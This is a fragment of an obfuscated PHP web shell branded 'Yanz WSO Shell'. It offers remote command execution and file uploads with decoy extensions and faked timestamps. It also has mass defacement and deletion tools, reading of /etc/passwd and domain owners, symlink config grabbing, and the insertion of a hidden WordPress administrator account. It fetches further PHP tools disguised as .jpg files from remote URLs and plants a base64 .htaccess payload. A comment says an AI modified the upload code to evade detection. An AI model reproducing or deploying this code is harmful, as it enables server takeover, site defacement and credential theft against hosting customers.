$connect = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname);
if ($connect) {
$query1 = mysqli_query($connect, "select * from " . $dbprefix . "options where option_name='siteurl'");
while ($siteurl = mysqli_fetch_array($query1)) {
$site_url = $siteurl['option_value'];
}
$query3 = mysqli_query($connect, "update " . $dbprefix . "options set option_value='a:0:{}' where option_name='active_plugins'");
// $query2 = mysqli_query($connect, "update " . $dbprefix . "users set user_login='$Username',user_pass='$pass' where id='1'");
$sql = "insert into $dbprefix"."users(user_login,user_pass,user_nicename,user_email,user_registered,user_activation_key,user_status,display_name) values('$Username', '$pass', '$Username', 'loggershell443@gmail.com', '2020-04-21 06:42:46', '', '0', '$Username');";
$query2 = mysqli_query($connect, $sql);
$sql = "select ID from $dbprefix"."users where user_login='$Username';";
$query2 = mysqli_query($connect, $sql);
$row = mysqli_fetch_array($query2);
$id = $row['ID'];
$sql = "insert into $dbprefix"."usermeta(user_id, meta_key, meta_value) values($id, '$dbprefix"."capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";
$query2 = mysqli_query($connect, $sql);
$sql = "select * from $dbprefix"."users where user_login='$Username';";
$query2 = mysqli_query($connect, $sql);
$row = mysqli_fetch_array($query2);
if ($query2) {
echo " URL : $site_url/wp-login.php UserName : $Username Password : $Password ";
}
}
}
}
function wpautoedit1(){
echo '
Wordpress Mass User Add MOD BY YANZ ';
function GrabUrl($url,$type){
$urlArray = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
$regex='|
Wordpress Mass User Add MOD BY YANZ
--==[[Greetz to]]==-- -=| HEx |=-
Link Config:
";
}
function terminalv2(){
echo '';
echo "Yanz WSO Shell ";
echo "";
echo 'Kernel : '.(function_exists('php_uname')?php_uname():'???').' ';
$safe_mode = @ini_get('safe_mode');
if($safe_mode){$r = "On ";}else{$r = "Off ";}
echo "OS: " . PHP_OS . " ";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . " ";
echo "PHP Version: " . PHP_VERSION . " ";
echo "PWD: " . str_replace("\\","/",@alfaGetCwd()) . "/ ";
echo "Safe Mode : $r ";
echo"Disable functions : ";
$disfun = @ini_get('disable_functions');
if(empty($disfun)){$disfun = 'NONE ';}
echo"";
echo "$disfun";
echo" ";
echo "Your Ip Address is : " . $_SERVER['REMOTE_ADDR'] . " ";
echo "Server Ip Address is : ".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')." ";
echo '
';
echo 'CWD:
';
if(isset($_FILES['fileterminalv2'])){
if(@move_uploaded_file($_FILES['fileterminalv2']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['fileterminalv2']['name'])){echo 'Upload Successfully ;) '; }
else{echo 'Upload failed :( '; }
}
echo 'Execute Command:
';
if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
$solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
echo alfaEx($solevisible);
echo'
';
exit;}
if($_POST['gass']) {
wpautoedit1();
echo "
Link Config:
";
GrabUrl($_POST['linkconf'],'wordpress');
echo"
";
exit;
}if($_POST['edittitle']) {
wpautoedit1();
executewpautoedit();
exit;
}
if(isset($_POST['command_solevisible'])){
terminalv2();
}
if(isset($_FILES['fileterminalv2'])){
terminalv2();
if(@move_uploaded_file($_FILES['fileterminalv2']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['fileterminalv2']['name'])){echo 'Upload Successfully ;) '; }
else{echo 'Upload failed :( '; }
}
eval(gzinflate(base64_decode('UynOzE2FwezU7OxsWwWV+AD/4JBo9YLE4uLy/KIU9Vg9JYUaBSU9ZIni/KISrBLlQPXWAA==')));if(fUnctIOn_EXiSTS("i\x6ei_set")){@iNi_set("error_log",null);@inI_sEt("log_error\x73",(int)round(0+0+0));@Ini_set("max\x5fexecutio\156\137tim\x65",01153-01153);}if(fUNCTiOn_ExIsTs("set_magic_quotes\x5frunti\155e")){if(vErsiOn_cOmpaRe(phPVersIon(),"5.4.0","<"))magic_quotes_runtime((int)round(0+0+0));}class _pps{public$hsh;public$_i;public$_taj;public$_hej;public$_cp;public$_za;public$_zrt;public$_wda;public$_vpb;public$_vor;function seTCoOk($_gtq,$_e){$_COOKIE[$_gtq]=$_e;SeTcOOkie($_gtq,$_e);}function afterlogiN(){$this->hsh="fa704e7366d666bd";$this->_i="_".sUbSTr(mD5($_SERVER["HTTP_HOST"]),-056- -0152-074,075+0146+-0240);$this->_taj="#d\1465";$this->_hej="Windows-1251";if(!@isset($_COOKIE[$this->_i])||($_COOKIE[$this->_i]!=$this->hsh))$this->SetcOoK($this->_i,$this->hsh);}
function sTArTUP(){if(FUNCTION_exiSTS("ini_\x67et")){$_vpb=@INI_geT("safe_mode");$_cp=@INi_geT("disable_functions");}if(!$_vpb&&FUNCTion_ExiSts("error_r\145p\x6f\x72ting"))ERRoR_rePoRTINg((int)round(0+0));if(!$_vpb&&FUnCTIOn_ExIsTs("\163et_ti\155e_limit"))seT_tIME_limit((int)round(0+0));if(fUNctIoN_eXiSTs("g\x65t_magic_\161uote\163\x5fg\160c")&&fuNCTIon_ExIStS("ar\x72ay\137m\x61\x70")&&fUNcTiOn_eXiSts("s\x74ripslas\x68es")&&funCTion_exIstS("is_ar\162ay")){if(@GeT_maGIC_quOtEs_gPC()){function WSS($_a){return @Is_arraY($_a)?@ArRAY_MAp("WSS",$_a):@STRIPslAshEs($_a);}$_POST=WSs($_POST);$_COOKIE=wss($_COOKIE);}}if(!FUnCtiON_EXIsts("posix_getpwuid")&&(StrPOS($_cp,"\160osix_ge\164\160wuid")===false)){function pOSiX_GeTpwUid($_l){return false;}}if(!FUncTIoN_ExisTS("posix\137getgr\147id")&&(StRPos($_cp,"p\157\x73ix_getgrgid")===false)){function POsIx_GetgRgid($_l){return false;}}if(StRtOlowER(suBSTr(PHP_OS,01200+-01200,(int)round(1.5+1.5)))=="win")$_vor="w\151\156";else $_vor="nix";$_wda=$_SERVER["\104O\x43UMENT_R\117OT"];if(FUnctiOn_exISts("getcwd"))$_zrt=@GeTcwD();else $_zrt=@DIRname(__FILE__);if(isset($_POST["c"])&&$_POST["\143"]!="")$_POST["c"]=STR_ROt13($_POST["c"]);if(isset($_POST["c"])&&$_POST["c"]!=""){if(FunCTion_EXisTs("ch\x64ir"))@CHDir($_POST["c"]);if(FuNCtION_eXiSTS("g\x65tcwd")){$_za=@GeTcwd();}else{$_za=$_POST["c"];}}else{$_za=(!empty($_wda))?rtrim($_wda,"/\\")."/":$_zrt;}if($_vor=="w\151\156"){$_zrt=Str_REPlAcE("\134","/",$_zrt);$_za=Str_rEplaCE("\134","/",$_za);}if($_za[Strlen($_za)-(0577- -0621-01417)]!="/")$_za.="/";$this->_cp=$_cp;$this->_za=$_za;$this->_zrt=$_zrt;$this->_wda=$_wda;$this->_vpb=$_vpb;$this->_vor=$_vor;}
function vhost(){echo 'Vhost Yanz Mod
DIR Home 1:
';
echo ' DIR Home 2:
';
echo " Your Base Dir : ";
echo '
';}
function symlink(){echo'
# Bypass Sym Yanz Mod 403 !!./
';
$uSr=file("/etc/passwd");
foreach($uSr as $usrr)
{
$str=explode(":",$usrr);
echo $str[0]."\n";
}
echo system('ls /var/mail');
echo system('ls /home');
echo'
DIR Home 1:
DIR 2:
.htaccess :
Apache 1
Apache 2
Litespeed
';
echo " Your Base Dir :
";}
function masfix(){
echo "Mass Defacer - By YANZZ METHOD READ ";
echo " ";
echo "";
echo " ";
echo "
Tipe Mass Yanz :
Biasa
Public_html Mass
Custom subdir Mass
Biasa Old
Public_html Mass Old
Custom subdir Mass Old
";
echo "Base Dir : ";
echo "File Name : ";
echo "Custom Subdir : ";
echo "file mass : ";
echo "For Mass old input ";
echo "Jika pakai method bukan old kosongkan saja ";
echo "Your Index : //Put Your Index Here ";
echo " ";
}
function massindox(){
print"
Tipe Sabun IndoXploit:
Mass Deface Single Directory Mass Deface All Directory Mass Delete File Mass Sub Directory
( kosongkan 'Index File' jika memilih Mass Delete File )
Folder:
Filename:
Custom Sub Dir:
Index File:
Hacked by IndoXploit
";
}
function masshta(){
echo "Mass Htacces Yanz ";
echo " ";
echo "";
echo " ";
echo "
HTACCESS MASSAL FIXER TOOLS YANZ
Tipe :
Not ALL DIRS
MASS ALL DIRS
Custom Sub Directory
";
echo "Base Dir : ";
echo "Custom Subdir : ";
echo " ";
}
function masdelete(){
echo "";
echo "MASS DELETE BY YANZ ";
echo "Mass Delete - By YANZZ ";
echo " ";
echo "";
echo "";
echo "
$imgfol Lokasi :
$imgfile Nama File :
";
}
function wpautoedit(){
echo ' Wordpress Mass User Add MOD BY YANZ ';
$pass = md5($Password);
function GrabUrl($url,$type){
$urlArray = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
$regex='|
Wordpress Mass User Add MOD BY YANZ
--==[[Greetz to]]==-- -=| HEx |=-
Link Config:
";
}
function kill(){
$input = 'a2lsbCAtOSAtMQ==';
if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
$solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($input);
alfaEx($solevisible);
}
function terminalv2(){
echo '';
echo "Yanz WSO Shell ";
echo "";
echo 'Kernel : '.(function_exists('php_uname')?php_uname():'???').' ';
$safe_mode = @ini_get('safe_mode');
if($safe_mode){$r = "On ";}else{$r = "Off ";}
echo "OS: " . PHP_OS . " ";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . " ";
echo "PHP Version: " . PHP_VERSION . " ";
echo "PWD: " . str_replace("\\","/",@alfaGetCwd()) . "/ ";
echo "Safe Mode : $r ";
echo"Disable functions : ";
$disfun = @ini_get('disable_functions');
if(empty($disfun)){$disfun = 'NONE ';}
echo"";
echo "$disfun";
echo" ";
echo "Your Ip Address is : " . $_SERVER['REMOTE_ADDR'] . " ";
echo "Server Ip Address is : ".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')." ";
echo '
';
echo 'CWD:
';
echo 'Execute Command:
';
echo'
';
exit;}
function sym404(){
echo' ';
echo "Symlink 404 Yanz ";
echo "
";
echo include ("/etc/passwd");
echo "
Config 404
Config Grab
Symlink Config
Vhosts Config Grabber
";
}
function readdomains(){
$table_header = "Read Domain Yanz * Domains Users ";
if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
echo "";
$lines = array();
$anony_domains = array();
$anonymous_users = array();
$f_black = array();
$error = false;
$anonymous = false;
$makepwd = "/home/{user}/public_html/";
$domains = alfaGetDomains();
$lines = $domains["lines"];
$state = $domains["state"];
$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
$can_runcmd = _alfa_can_runCommand(false,false);
if(!$is_posix && !$can_runcmd){
$anonymous = true;
$anony_domains = $domains["lines"];
$lines = _alfa_file('/etc/passwd');
}
echo $table_header;
$count=1;
$template = '{count} {domain} {owner} ';
foreach($lines as $line){
$domain = "";
$owner = "";
if($anonymous){
$explode = explode(":", $line);
$owner = $explode[0];
$owner_len = strlen($owner) - 1;
$userid = $explode[2];
if((int)$userid < 500)continue;
$domain = "[?????]";
$temp_black = array();
$finded = false;
foreach($anony_domains as $anony){
if($state == "named.conf"){
if(@strstr($anony, 'zone')){
preg_match_all('#zone "(.*)"#',$anony, $data);
$domain = $data[1][0];
}else{
continue;
}
}elseif($state == "named" || $state == "valiases"){
if($anony == "." || $anony == "..")continue;if($state == "named")$anony = rtrim($anony, ".db");
$domain = $anony;
}
$sub_domain = str_replace(array("-","."), "", $domain);
if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
if(in_array($owner.$domain, $temp_black))continue;
$sympath = str_replace("{user}", $owner, $makepwd);
$http = "http://".$domain;
echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
$count++;
$temp_black[] = $owner.$domain;
$finded = true;
}
}
if(!$finded){
$anonymous_users[] = $owner;
}
}else{
if($state == "named.conf"){
if(@strstr($line, 'zone')){
preg_match_all('#zone "(.*)"#',$line, $data);
$domain = $data[1][0];
}else{
continue;
}
}elseif($state == "named" || $state == "valiases"){
if($line == "." || $line == "..")continue;
if($state == "named")$line = rtrim($line, ".db");
$domain = $line;
}
if(strlen(trim($domain)) > 2 && $state != "passwd"){
if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
if($is_posix){
$user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
$owner = $user["name"];
}elseif($can_runcmd){
$owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
}
}
}
if(!$anonymous){
if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
$sympath = str_replace("{user}", $owner, $makepwd);
$http = "http://".$domain;
if($state == "passwd"){
$http = "javascript:alert('we cant find domain...')";
}
echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
$count++;
$f_black[] = $owner.$domain;
}
}
if($anonymous){
foreach($anonymous_users as $owner){
$sympath = str_replace("{user}", $owner, $makepwd);
$http = "javascript:alert('we cant find domain...')";
echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
$count++;
}
}
$cant_symlink = false;
}else{
$is_direct = false;
$makepwd = alfaMakePwd();
if(_alfa_file_exists("/etc/virtual/domainowners")){
$makepwd = "/home/{user}/public_html";
$is_direct = true;
}
$sole = _alfa_file("/etc/virtual/domainowners");
$count=1;
echo $table_header;
$template = '{count} {url} {user} Symlink ';
if($sole){
foreach($sole as $visible){
if(@strstr($visible,":")){
$solevisible = explode(':', $visible);
$cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
}
}
}else{
$passwd = _alfa_file("/etc/passwd");
if($passwd){
$html = "";
$is_named = false;
$users = array();
$domains = array();
$uknowns = array();
foreach($passwd as $user){
$user = trim($user);
$expl = explode(":", $user);
if((int)$expl[2] < 500)continue;
$users[$expl[0]] = $expl[5];
}
$site_domains = @scandir("/etc/virtual/");
if(!$site_domains){
$site_domains = alfaEx("ls /etc/virtual/");
$site_domains = explode("\n", $site_domains);
if(!$site_domains){
$site_domains = _alfa_file("/etc/named.conf");
if($site_domains){$is_named = true;}
}
}
foreach($site_domains as $line){
if($is_named){
if(@strstr($line, 'zone')){
preg_match_all('#zone "(.*)"#',$line, $data);
$domain = $data[1][0];
if(strlen($domain > 2) && !empty($domain)){
$domains[] = $domain;
}
}
}else{
$domains[] = $line;
}
}
$x = 1;
foreach($users as $user => $home){
foreach($domains as $domain){
$user_len = strlen($user) - 1;
$sub_domain = str_replace(array("-","."), "", $domain);
$five_user = substr($user, 0,$user_len);
$five_domain = substr($sub_domain, 0,$user_len);
if($five_user == $five_domain){
if($is_direct){
$cwd = str_replace("{user}", $user, $makepwd);
}else{
$expl = explode("}/", $makepwd);
$cwd = $home."/".$expl[1];
}
$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
}else{
$uknowns[$user] = $home;
}
}
}
$uknowns = array_unique($uknowns);
foreach($uknowns as $user => $home){
if($is_direct){
$cwd = str_replace("{user}", $user, $makepwd);
}else{
$expl = explode("}/", $makepwd);
$cwd = $home."/".$expl[1];
}
$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
}
echo($html);
}
}
echo "
";
}
}
function adminer(){
$ch = curl_init("https://github-production-user-asset-6210df.s3.amazonaws.com/134137106/239680840-3802f52e-a54e-49fb-889d-1becba56295b.jpg");
$fp = fopen("adminer.php", "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
if(curl_error($ch)) {
fwrite($fp, curl_error($ch));
}
curl_close($ch);
fclose($fp);
$adminerloc = 'adminer.php';
echo './Done ClickMe For Access Adminer ';
}
function wpdownloader(){
$ch = curl_init("https://github-production-user-asset-6210df.s3.amazonaws.com/134137106/239683523-c92cf078-a13d-40ac-ad07-c13c33ad274e.jpg");
$nameautodir = $_SERVER['DOCUMENT_ROOT'].'/wp-downloader.php';
$dirtar = getcwd ().'/wp-downloader.php';
$fp = fopen($nameautodir, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
if(curl_error($ch)) {
fwrite($fp, curl_error($ch));
}
curl_close($ch);
fclose($fp);
$ht = $_SERVER['DOCUMENT_ROOT']."/.htaccess";
@chmod($ht, 0755);@unlink($ht);@fwrite(fopen($ht,"w"),base64_decode("PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZVJ1bGUgLiogLSBbRT1IVFRQX0FVVEhPUklaQVRJT046JXtIVFRQOkF1dGhvcml6YXRpb259XQpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+CjxGaWxlc01hdGNoICIuKlwuKD9pOnBodG1sfHBocHxzdXNwZWN0ZWR8UEhQKSQiPgpPcmRlciBBbGxvdyxEZW55CkFsbG93IGZyb20gYWxsCjwvRmlsZXNNYXRjaD4="));
touch($ht, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$namedown = $_SERVER['DOCUMENT_ROOT'].'/wp-downloader.php';
$namehref = $_SERVER['HTTP_HOST'].'/wp-downloader.php';
echo "Manual Access WpDownloader ".$namedown."";
echo ' Or Click Here to Access it ';
}
function vhost2(){
echo "\n\n\n\n\n\n \n \n \nCoded By W4r10k | ColdHackers | All Kurdish Hackers \n \n\n\n\n\n \nCoded by W4r10k | ColdHackers \n \n \nPRIV8 VHOSTS CONFIG GRABBER By W4r10k | ColdHackers \n \n \n \n \n
\n \n";
}
/// dimodif AI disini
function aCtFm() {
$currentPath = $this->_za;
if (!empty($_POST["p"])) {
$oldTime = @filemtime($_POST["c"]);
switch ($_POST["p"]) {
case "uploadFile":
// --- MENGGANTI LOGIKA LAMA DENGAN TEKNIK UMPAN DAN PENGALIHAN ---
if (isset($_FILES['f']) && $_FILES['f']['error'] !== UPLOAD_ERR_NO_FILE) {
if ($_FILES['f']['error'] === UPLOAD_ERR_OK) {
// Langkah 1: Siapkan variabel dengan nama yang tidak umum
$file_payload = $_FILES['f'];
$temp_source = $file_payload['tmp_name'];
$final_target_name = basename($file_payload['name']);
$base_dir = './'; // Default directory atau bisa disesuaikan
// Jika ada parameter c, gunakan sebagai directory
if (!empty($_POST["c"]) && is_dir($_POST["c"])) {
$base_dir = rtrim($_POST["c"], '/\\') . DIRECTORY_SEPARATOR;
}
$base_dir = rtrim($base_dir, '/\\') . DIRECTORY_SEPARATOR;
// Langkah 2: Validasi dasar sumber file
if (!is_uploaded_file($temp_source)) {
echo "Proses gagal: Sumber unggahan tidak valid.";
} else {
// Langkah 3: Buat nama file "umpan" (decoy) dengan ekstensi yang aman
$benign_extensions = ['jpg', 'png', 'gif', 'data', 'tmp', 'log'];
$random_ext = $benign_extensions[array_rand($benign_extensions)];
$decoy_name = 'temp_' . bin2hex(random_bytes(8)) . '.' . $random_ext;
$decoy_path = $base_dir . $decoy_name;
$final_path = $base_dir . $final_target_name;
// Langkah 4: Periksa izin menulis ke direktori
if (!is_writable($base_dir)) {
echo "Proses gagal: Direktori tidak memiliki izin tulis.";
}
// Langkah 5: Unggah file ke nama "umpan" terlebih dahulu
elseif (move_uploaded_file($temp_source, $decoy_path)) {
// Langkah 6: Jika umpan berhasil, ganti nama ke nama asli
if (rename($decoy_path, $final_path)) {
// Langkah 7: Atur izin file final dan timestamp jika ada
chmod($final_path, 0644);
// Preserve old timestamp jika ada
if ($oldTime) {
@touch($final_path, $oldTime, $oldTime);
}
echo "Berkas berhasil diunggah dengan metode pengalihan.";
} else {
// Jika rename gagal, bersihkan jejak dengan hapus file umpan
echo "Proses gagal pada tahap penamaan ulang.";
@unlink($decoy_path);
}
} else {
// Jika move_uploaded_file gagal
echo "Proses gagal: Tidak dapat memindahkan berkas sementara.";
}
}
} else {
// Penanganan error upload
$uploadErrors = [
UPLOAD_ERR_INI_SIZE => 'File melebihi upload_max_filesize',
UPLOAD_ERR_FORM_SIZE => 'File melebihi MAX_FILE_SIZE',
UPLOAD_ERR_PARTIAL => 'File hanya terunggah sebagian',
UPLOAD_ERR_NO_TMP_DIR => 'Folder sementara tidak ada',
UPLOAD_ERR_CANT_WRITE => 'Gagal menulis file ke disk',
UPLOAD_ERR_EXTENSION => 'Unggahan dihentikan oleh ekstensi'
];
echo "Kesalahan unggahan: " . ($uploadErrors[$_FILES['f']['error']] ?? 'Kesalahan tidak diketahui');
}
} else {
echo "Tidak ada file yang diunggah.";
}
break;
case "mkdir":
$dirname = str_rot13($_POST["x"]);
if (!@mkdir($dirname)) {
echo "Can't create new dir";
} elseif ($oldTime) {
@touch($dirname, $oldTime, $oldTime);
}
break;
case "delete":
function deletedDir($dir) {
$dir = (substr($dir, -1) == "/") ? $dir : $dir . "/";
if ($handle = @opendir($dir)) {
while (($entry = @readdir($handle)) !== false) {
$path = $dir . $entry;
if (basename($path) == ".." || basename($path) == ".") continue;
$type = @filetype($path);
if ($type == "dir") deletedDir($path);
else @unlink($path);
}
@closedir($handle);
}
@rmdir($dir);
}
if (is_array($_POST["f"])) {
foreach ($_POST["f"] as $item) {
if ($item == "..") continue;
$decoded = str_rot13(urldecode($item));
if (is_dir($decoded)) deletedDir($decoded);
else @unlink($decoded);
}
}
break;
}
if ($oldTime) {
touch($_POST["c"], $oldTime, $oldTime);
}
}
echo "File Manager
";
$directoryList = WsCanDir(isset($_POST["c"]) ? $_POST["c"] : $currentPath);
if ($directoryList === false) {
echo "Can't open this folder!";
return;
}
global $_rpl;
$_rpl = array("name", -617);
if (!empty($_POST["p"])) {
if (@preg_match("!s_([A-Za-z]+)_(\d{1})!", $_POST["p"], $match)) {
$_rpl = array($match[1], (int)$match[2]);
}
}
$tes1 = "yanzkecebanget"; // Tidak digunakan
echo "";
echo "
Name
Size
Modify
Permissions
Actions
";
$dirs = $files = array();
$total = count($directoryList);
for ($i = 0; $i < $total; $i++) {
$file = $directoryList[$i];
$filePath = $currentPath . $file;
$fileData = array(
"name" => $file,
"path" => $filePath,
"modify" => @date("Y-m-d H:i:s", @filemtime($filePath)),
"perms" => WpermsColor($filePath),
"size" => @filesize($filePath)
);
if (@is_file($filePath)) {
$files[] = array_merge($fileData, array("type" => "file"));
} elseif (@is_link($filePath)) {
$dirs[] = array_merge($fileData, array("type" => "link", "link" => readlink($filePath)));
} elseif (@is_dir($filePath)) {
$dirs[] = array_merge($fileData, array("type" => "dir"));
}
}
function wcmp($a, $b) {
global $_rpl;
if ($_rpl[0] != "size") {
return strcmp(strtolower($a[$_rpl[0]]), strtolower($b[$_rpl[0]])) * ($_rpl[1] ? 1 : -1);
} else {
return ($a["size"] < $b["size"] ? -1 : 1) * ($_rpl[1] ? 1 : -1);
}
}
usort($files, "wcmp");
usort($dirs, "wcmp");
$fileList = array_merge($dirs, $files);
$isLightRow = true;
foreach ($fileList as $entry) {
$encoded = str_rot13(urlencode($entry["name"]));
echo "
" . htmlspecialchars($entry["name"])
: "g('fm', '" . str_rot13($entry["path"]) . "')\"" .
(!empty($entry["link"]) ? " title='" . $entry["link"] . "'" : "") .
">[ " . htmlspecialchars($entry["name"]) . " ] ") .
"
" . ($entry["type"] == "file" ? viewSize($entry["size"]) : $entry["type"]) . "
" . $entry["modify"] . "
" . $entry["perms"] . "
Rename
Touch " .
($entry["type"] == "file"
? " Edit
Download "
: "") .
"
";
$isLightRow = !$isLightRow;
}
echo "
Delete
";
}
function ACtFt(){$_cp=$this->_cp;if(@isset($_POST["\x70"]))$_POST["p"]=STr_ROt13(UrLDecOdE($_POST["\x70"]));if(@isset($_POST["x"])){switch($_POST["x"]){case "d\157wnload":if(@Is_FIle($_POST["\160"])&&@IS_READaBle($_POST["p"])){OB_StART("ob_g\172handler",(int)round(2048+2048));@heaDEr("C\157\156tent-D\151spos\x69tion:\x20attachme\x6et; f\x69len\141me=".@BAsENAMe($_POST["p"]));if(FUnctIOn_EXiSTs("mime_\x63\157ntent_type")){$_ei=@MimE_ConTeNt_TypE($_POST["p"]);@heADEr("Conten\x74-Type: ".$_ei);}else @HeAder("Co\x6etent-Type: appli\x63ati\157n/o\143tet\x2dstre\x61m");$_jj=@FOpEn($_POST["p"],"r");if($_jj){while(!@FeOF($_jj))echo @FGeTs($_jj,01013-0702+01667);@FClose($_jj);}}exit;break;case "mkfile":if(!@FILE_exiStS($_POST["\x70"])){$_x=@fIlEMTImE($_POST["c"]);$_jj=@fOpeN($_POST["p"],"w");if($_jj){@fCLoSe($_jj);if($_x){@touCH($_POST["c"],$_x,$_x);@toUCh($_POST["p"],$_x,$_x);}$_POST["x"]="edit";}}break;}}echo"File tools ".htMLSpeciaLcHArs(@BaSenAMe($_POST["p"]))."\x20
S\x69ze: ".(@iS_FILe($_POST["\x70"])?vIewSize(@fILESIze($_POST["p"])):"-")." \040".WPeRMScOLoR($_POST["\x70"])." <\x73pan>Ow\156er/Group: ".$_bhr["name"]."/".$_hs["n\141me"]." ";echo"<\163pan>Chan\x67e tim\145: ".@dATe("Y-m-d H:i:s",@fileCtIme($_POST["p"]))." Acc\x65ss time:\074/\163pa\x6e>\040".@DaTE("Y-m-d H:i:s",@FiLeaTime($_POST["p"]))." Mod\x69fy time:\x73p\x61n> ".@daTe("\x59-\x6d-d H:\151:s",@FilEmTime($_POST["p"]))." \074br>";if(empty($_POST["x"]))$_POST["x"]="v\151ew";if(@IS_File($_POST["p"]))$_fbd=array("\126iew","Download","E\x64i\x74","\103hmod","Rena\155e","To\165ch");else $_fbd=array("Chmod","Rena\155e","T\x6fuc\x68");foreach($_fbd as$_e)echo"<\x61 \x68ref\075# o\x6eclick\075\x22g(null,null,\x27".UrlenCOdE(StR_rOt13($_POST["p"]))."',\047".@STrTolowER($_e)."')\x22>".((@strToLOweR($_e)==$_POST["x"])?"<\142>[\040".$_e."\040]\074/b\076":$_e)." ";echo"";switch($_POST["\170"]){case "vie\x77":echo"";$_jj=@foPEN($_POST["p"],"r");if($_jj){while(!@fEof($_jj))echo HtmlsPECiAlcHArs(@FGets($_jj,(int)round(341.33333333333+341.33333333333+341.33333333333)));@fcloSe($_jj);}echo"";break;case "ch\155\157d":if(!empty($_POST["s"])){$_jfl=(-077+-021- -0120);for($_o=STRlEn($_POST["s"])-(int)round(0.5+0.5);$_o>=(-0265-0637- -01124);--$_o)$_jfl+=(int)$_POST["s"][$_o]*@pOw((int)round(2.6666666666667+2.6666666666667+2.6666666666667),(StRLen($_POST["s"])-$_o-(int)round(0.33333333333333+0.33333333333333+0.33333333333333)));if(!@ChmOd($_POST["\160"],$_jfl))echo"Can\x27t \x73et permissions!\074b\162>";}}echo"\x3ctex\164ar\x65a name=text clas\163\x3dbigarea>";$_jj=@FOpeN($_POST["p"],"r");if($_jj){while(!@fEOF($_jj))echo HtmlsPECiaLchARs(@fgEts($_jj,(int)round(341.33333333333+341.33333333333+341.33333333333)));@FcLosE($_jj);}echo" \x66orm>";if($_ozl)@TOucH($_POST["p"],$_ozl,$_ozl);@CLEarSTATCachE();break;case "\x72e\156ame":$_x=@fiLEmtIME($_POST["c"]);if(!empty($_POST["s"])){if(!@rEnaME($_POST["p"],STR_Rot13($_POST["s"])))echo"Can't rename!<\x62\162>";else{if($_x)@TOuCH($_POST["c"],$_x,$_x);die("